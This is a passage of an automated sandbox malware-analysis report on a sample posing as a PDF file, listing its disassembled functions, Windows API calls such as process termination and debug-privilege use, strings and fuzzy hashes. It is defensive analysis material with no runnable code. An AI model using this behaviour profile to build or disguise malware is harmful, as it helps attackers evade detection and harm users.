                                                                            • Part of subcall function 00B6A71E: DeleteObject.GDI32(00000000), ref: 00B6A757
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                          • String ID:
                                                                          • API String ID: 2819616528-0
                                                                          • Opcode ID: aec3ad984ad932716cb23db806702ddbc2031adeabd03fc872b03ea66c16241c
                                                                          • Instruction ID: b836c97d8dc4386fa395a7cc624f2da24a9d6e2699f939cb384589bbdeedd740
                                                                          • Opcode Fuzzy Hash: aec3ad984ad932716cb23db806702ddbc2031adeabd03fc872b03ea66c16241c
                                                                          • Instruction Fuzzy Hash: CA515870A40249AFDB24DF25DC46FBA3BF9EB58310F104569F902972A0DBB4ED90DB60
                                                                          Function 00B38E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00B38A84,00000B00,?,?), ref: 00B38E0C
                                                                          • HeapAlloc.KERNEL32(00000000,?,00B38A84,00000B00,?,?), ref: 00B38E13
                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B38A84,00000B00,?,?), ref: 00B38E28
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00B38A84,00000B00,?,?), ref: 00B38E30
                                                                          • DuplicateHandle.KERNEL32(00000000,?,00B38A84,00000B00,?,?), ref: 00B38E33
                                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00B38A84,00000B00,?,?), ref: 00B38E43
                                                                          • GetCurrentProcess.KERNEL32(00B38A84,00000000,?,00B38A84,00000B00,?,?), ref: 00B38E4B
                                                                          • DuplicateHandle.KERNEL32(00000000,?,00B38A84,00000B00,?,?), ref: 00B38E4E
                                                                          • CreateThread.KERNEL32(00000000,00000000,00B38E74,00000000,00000000,00000000), ref: 00B38E68
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                          • String ID:
                                                                          • API String ID: 1957940570-0
                                                                          • Opcode ID: e3a38e866beeed91e8540345f101bbe3b852f87e247770bdf8c68f08f6e9bb44
                                                                          • Instruction ID: 80887c669baa1f5c94553c19e5fedd08bc505c9916641f442a1f4544a6d7c257
                                                                          • Opcode Fuzzy Hash: e3a38e866beeed91e8540345f101bbe3b852f87e247770bdf8c68f08f6e9bb44
                                                                          • Instruction Fuzzy Hash: B601BBB5240309FFEB10ABA5EC4DF6B3BACEB89751F004421FA05DB1E1CAB59800CB20
                                                                          Function 00B59428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearInit$_memset
                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                          • API String ID: 2862541840-625585964
                                                                          • Opcode ID: 2eef14c4379743b638a10ee4fe14cc74d23b5861b61589dd0215129167481b77
                                                                          • Instruction ID: 78a4f958b8885590ff5f6c700aa5f8582b93708c03fec5582b335e189e964a1d
                                                                          • Opcode Fuzzy Hash: 2eef14c4379743b638a10ee4fe14cc74d23b5861b61589dd0215129167481b77
                                                                          • Instruction Fuzzy Hash: EE918C71A00215EBDF24DFA5D888FAEBBF8EF45711F1081D9F915AB290D7709909CBA0
                                                                          Function 00B59A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B37652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B3758C,80070057,?,?,?,00B3799D), ref: 00B3766F
                                                                            • Part of subcall function 00B37652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B3758C,80070057,?,?), ref: 00B3768A
                                                                            • Part of subcall function 00B37652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B3758C,80070057,?,?), ref: 00B37698
                                                                            • Part of subcall function 00B37652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B3758C,80070057,?), ref: 00B376A8
                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00B59B1B
                                                                          • _memset.LIBCMT ref: 00B59B28
                                                                          • _memset.LIBCMT ref: 00B59C6B
                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00B59C97
                                                                          • CoTaskMemFree.OLE32(?), ref: 00B59CA2
                                                                          Strings
                                                                          • NULL Pointer assignment, xrefs: 00B59CF0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                          • String ID: NULL Pointer assignment
                                                                          • API String ID: 1300414916-2785691316
                                                                          • Opcode ID: 797f7a7067ab3f348b364e5bab0a5ddf98dc9b660bd2b2a94f9e629765b4a6f9
                                                                          • Instruction ID: e2affbbb87a69c97bc7f6fdf104b2a620805c61fe3a39f50a4a206658c116afa
                                                                          • Opcode Fuzzy Hash: 797f7a7067ab3f348b364e5bab0a5ddf98dc9b660bd2b2a94f9e629765b4a6f9
                                                                          • Instruction Fuzzy Hash: 13912971D00219EBDF10DFA5DC85ADEBBB9EF08710F2041AAF919A7291DB715A44CFA0
                                                                          Function 00B66FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B67093
                                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00B670A7
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B670C1
                                                                          • _wcscat.LIBCMT ref: 00B6711C
                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00B67133
                                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B67161
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window_wcscat
                                                                          • String ID: SysListView32
                                                                          • API String ID: 307300125-78025650
                                                                          • Opcode ID: 8116d91f27335df77063855dde2d1d23284ac5852b77fee28d087ca154cd562f
                                                                          • Instruction ID: 9967a04e0df41658f7dca9c7415bfb3bbfad49e6ae15d7f119bed3aa220bd342
                                                                          • Opcode Fuzzy Hash: 8116d91f27335df77063855dde2d1d23284ac5852b77fee28d087ca154cd562f
                                                                          • Instruction Fuzzy Hash: B641E271944308AFEB21DFA4CC85BEE77E8EF08354F1004AAF544E72D2DA759D848B60
                                                                          Function 00B5EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B43E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00B43EB6
                                                                            • Part of subcall function 00B43E91: Process32FirstW.KERNEL32(00000000,?), ref: 00B43EC4
                                                                            • Part of subcall function 00B43E91: CloseHandle.KERNEL32(00000000), ref: 00B43F8E
                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B5ECB8
                                                                          • GetLastError.KERNEL32 ref: 00B5ECCB
                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B5ECFA
                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B5ED77
                                                                          • GetLastError.KERNEL32(00000000), ref: 00B5ED82
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00B5EDB7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                          • String ID: SeDebugPrivilege
                                                                          • API String ID: 2533919879-2896544425
                                                                          • Opcode ID: 50a252c36408f78999eefdd93654bd69a92a16f25a05a94cdf1845b478a391e9
                                                                          • Instruction ID: 36aa85f035bf7c4ed6a22ea15fd54b81099d571884386bbccd11e222b709a5f3
                                                                          • Opcode Fuzzy Hash: 50a252c36408f78999eefdd93654bd69a92a16f25a05a94cdf1845b478a391e9
                                                                          • Instruction Fuzzy Hash: 7A419C712002019FDB14EF24CD95F7EB7E5AF80714F1880A9F9529B2D2DBB5E908CB96
                                                                          Function 00B43226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 00B432C5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: IconLoad
                                                                          • String ID: blank$info$question$stop$warning
                                                                          • API String ID: 2457776203-404129466
                                                                          • Opcode ID: dc6baf27f4e4d028fe3fd0a1fd33b97d5aaa6439d4b934809b0eda74713f1b89
                                                                          • Instruction ID: a25b7a7e10dc34e9f20eda0725eb06c8a5a9566b409061d7fcdcfb1a3d10cc89
                                                                          • Opcode Fuzzy Hash: dc6baf27f4e4d028fe3fd0a1fd33b97d5aaa6439d4b934809b0eda74713f1b89
                                                                          • Instruction Fuzzy Hash: 2611E731208356BAEB015B54EC83C6AB7DCEF19B70F2400EAF900A61C1EBE55F4059E5
                                                                          Function 00B44534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B4454E
                                                                          • LoadStringW.USER32(00000000), ref: 00B44555
                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B4456B
                                                                          • LoadStringW.USER32(00000000), ref: 00B44572
                                                                          • _wprintf.LIBCMT ref: 00B44598
                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B445B6
                                                                          Strings
                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 00B44593
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                          • API String ID: 3648134473-3128320259
                                                                          • Opcode ID: 7200fe25c944fcee115a901f6c1ec3bbd62cd89eb71919eb227f6ac4e060af89
                                                                          • Instruction ID: e6cd81bca0b50c73306ba271dcc3eb6328b2f570d3a494032e2d20fd57feeb8b
                                                                          • Opcode Fuzzy Hash: 7200fe25c944fcee115a901f6c1ec3bbd62cd89eb71919eb227f6ac4e060af89
                                                                          • Instruction Fuzzy Hash: DF0144F2504209BFE7509794ED89EF677ACE708741F0005A5F745E3091EAB49E958F70
                                                                          Function 00B6D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE2612: GetWindowLongW.USER32(?,000000EB), ref: 00AE2623
                                                                          • GetSystemMetrics.USER32(0000000F), ref: 00B6D78A
                                                                          • GetSystemMetrics.USER32(0000000F), ref: 00B6D7AA
                                                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00B6D9E5
                                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B6DA03
                                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B6DA24
                                                                          • ShowWindow.USER32(00000003,00000000), ref: 00B6DA43
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00B6DA68
                                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 00B6DA8B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                          • String ID:
                                                                          • API String ID: 1211466189-0
                                                                          • Opcode ID: 7837e9f3e3b5849a5bddf199fc5d6ae6d2abbcf5c72bd956de491c90dc117e98
                                                                          • Instruction ID: 4ea5580ca61a3bed2d88d9dd3bbed096c367efe45a3212db8a77e123dd458d70
                                                                          • Opcode Fuzzy Hash: 7837e9f3e3b5849a5bddf199fc5d6ae6d2abbcf5c72bd956de491c90dc117e98
                                                                          • Instruction Fuzzy Hash: B9B16871A04226ABDF14CF69C9C57BD7BF1FF44701F0881A9ED489B295DB38A950CB60
                                                                          Function 00AE2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B1C417,00000004,00000000,00000000,00000000), ref: 00AE2ACF
                                                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00B1C417,00000004,00000000,00000000,00000000,000000FF), ref: 00AE2B17
                                                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00B1C417,00000004,00000000,00000000,00000000), ref: 00B1C46A
                                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B1C417,00000004,00000000,00000000,00000000), ref: 00B1C4D6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ShowWindow
                                                                          • String ID:
                                                                          • API String ID: 1268545403-0
                                                                          • Opcode ID: 043ab491ebef16d34b42bd1459df94c3f898a17709a6a965a24fd0eb83764414
                                                                          • Instruction ID: 9472f565303f3aa2701340c4d73f8a42ba61407775d865f4ae75a8ef2636c492
                                                                          • Opcode Fuzzy Hash: 043ab491ebef16d34b42bd1459df94c3f898a17709a6a965a24fd0eb83764414
                                                                          • Instruction Fuzzy Hash: 0A41FC312086C09AD7358B2ADC9CBBB7BEAEB46350F58847EE047876A1CA7598C1D711
                                                                          Function 00B47368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00B4737F
                                                                            • Part of subcall function 00B00FF6: std::exception::exception.LIBCMT ref: 00B0102C
                                                                            • Part of subcall function 00B00FF6: __CxxThrowException@8.LIBCMT ref: 00B01041
                                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00B473B6
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00B473D2
                                                                          • _memmove.LIBCMT ref: 00B47420
                                                                          • _memmove.LIBCMT ref: 00B4743D
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00B4744C
                                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00B47461
                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B47480
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 256516436-0
                                                                          • Opcode ID: 7fa3484de5e441f6125ef1615ce106af6330a10d7fbffc9e06a0bcbff42009d2
                                                                          • Instruction ID: 0c706a6230c06cdc13fb305de6e62bc440e84d0082412e2d32842435788fbe30
                                                                          • Opcode Fuzzy Hash: 7fa3484de5e441f6125ef1615ce106af6330a10d7fbffc9e06a0bcbff42009d2
                                                                          • Instruction Fuzzy Hash: E6316E31904206EBDF10EF58DD85AAA7BB8EF45710B1441A5F904AB286DF749A14DBA0
                                                                          Function 00B66442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DeleteObject.GDI32(00000000), ref: 00B6645A
                                                                          • GetDC.USER32(00000000), ref: 00B66462
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B6646D
                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00B66479
                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B664B5
                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B664C6
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B69299,?,?,000000FF,00000000,?,000000FF,?), ref: 00B66500
                                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B66520
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                          • String ID:
                                                                          • API String ID: 3864802216-0
                                                                          • Opcode ID: a42d9fccd552fa1dd7a1cbef2f5e2b37ec3252a68e563dc3d7821bcd866bd8bc
                                                                          • Instruction ID: 0829ea0bc4c889fccd0f86852cd200979ea81183754961709d68c976c0581de9
                                                                          • Opcode Fuzzy Hash: a42d9fccd552fa1dd7a1cbef2f5e2b37ec3252a68e563dc3d7821bcd866bd8bc
                                                                          • Instruction Fuzzy Hash: 66315C72201214BFEB118F50DC4AFFA3BA9EB19761F044065FE099A2A1DAB99841CB64
                                                                          Function 00B3C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memcmp
                                                                          • String ID:
                                                                          • API String ID: 2931989736-0
                                                                          • Opcode ID: e24b0071b8cd2a31f3764e1db092aa9bf4ae67003345e9107eb055598db859eb
                                                                          • Instruction ID: 5c24a2912836af6940f4343431a522dea6b46ee290cde8bd737c5c139e4bf791
                                                                          • Opcode Fuzzy Hash: e24b0071b8cd2a31f3764e1db092aa9bf4ae67003345e9107eb055598db859eb
                                                                          • Instruction Fuzzy Hash: 97219861600605BBD628A6654D52FBF3FDCDF203D4F2440E0FD09B62E2EB52DD1193A5
                                                                          Function 00B4ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
                                                                            • Part of subcall function 00AE9997: __swprintf.LIBCMT ref: 00AE9A0C
                                                                            • Part of subcall function 00AFFEC6: _wcscpy.LIBCMT ref: 00AFFEE9
                                                                          • _wcstok.LIBCMT ref: 00B4EEFF
                                                                          • _wcscpy.LIBCMT ref: 00B4EF8E
                                                                          • _memset.LIBCMT ref: 00B4EFC1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
